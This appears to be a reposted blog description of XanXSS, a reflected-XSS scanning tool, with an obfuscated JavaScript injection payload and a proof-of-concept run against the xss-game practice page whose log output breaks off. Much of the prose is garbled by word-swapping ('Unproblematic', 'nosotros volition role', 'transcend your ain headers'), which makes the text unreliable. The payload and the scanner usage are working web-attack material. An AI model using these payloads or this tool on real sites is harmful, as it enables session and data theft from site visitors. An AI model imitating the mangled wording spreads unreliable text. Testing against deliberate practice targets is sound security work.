Xanxss - A Unproblematic Xss Finding Tool

XanXSS is a reflected XSS searching tool (DOM coming soon) that creates payloads based from templates. Unlike other XSS scanners that but run through a listing of payloads. XanXSS tries to brand the payload unidentifiable, for example:

 Src= [2].Find(CoNfirm);= "JAVaScRIpT:proMpT(1))"javAscrIpt:/*--> />cLIcK
Me!

With XanXSS every payload is different. XanXSS plant past times running through the payloads until a specified reveal is establish or a timer hits the max time, this prevents it from looping for to long. Some of the features included inwards XanXSS:

• Ability to transcend your ain headers using -H
• Ability to generate a polyglot script using -P
• Ability to run behind a proxy using --proxy
• And many more

Proof of Concept
For this proof of concept nosotros volition role https://xss-game.appspot.com/level1/frame

admin@TBG-a0216: /bin/python/xanxss$ python xanxss.py -u "http://xss-game.appspot.com/level1/frame?query=" -a 12 -t 12 -f 25 -v       ____  ___             ____  ___  _________ _________     \   \/  /____    ____ \   \/  / /   _____//   _____/      \     /\__  \  /    \ \     /  \_____  \ \_____  \       /     \ / __ \|   |  \/     \  /        \/        \     /___/\  (____  /___|  /___/\  \/_______  /_______  /           \_/    \/     \/      \_/        \/        \/  Twitter->   @stay__salty Github -->  ekultek          Version---> v(0.1)   [info][16:37:34] using default payloads [info][16:37:34] generating payloads [info][16:37:34] running payloads through tampering procedures [info][16:37:34] payloads tampered successfully [info][16:37:34] running payloads [debug][16:37:34] running payload '' [debug][16:37:34] running payload '' [debug][16:37:35] running payload '' [debug][16:37:35] running payload '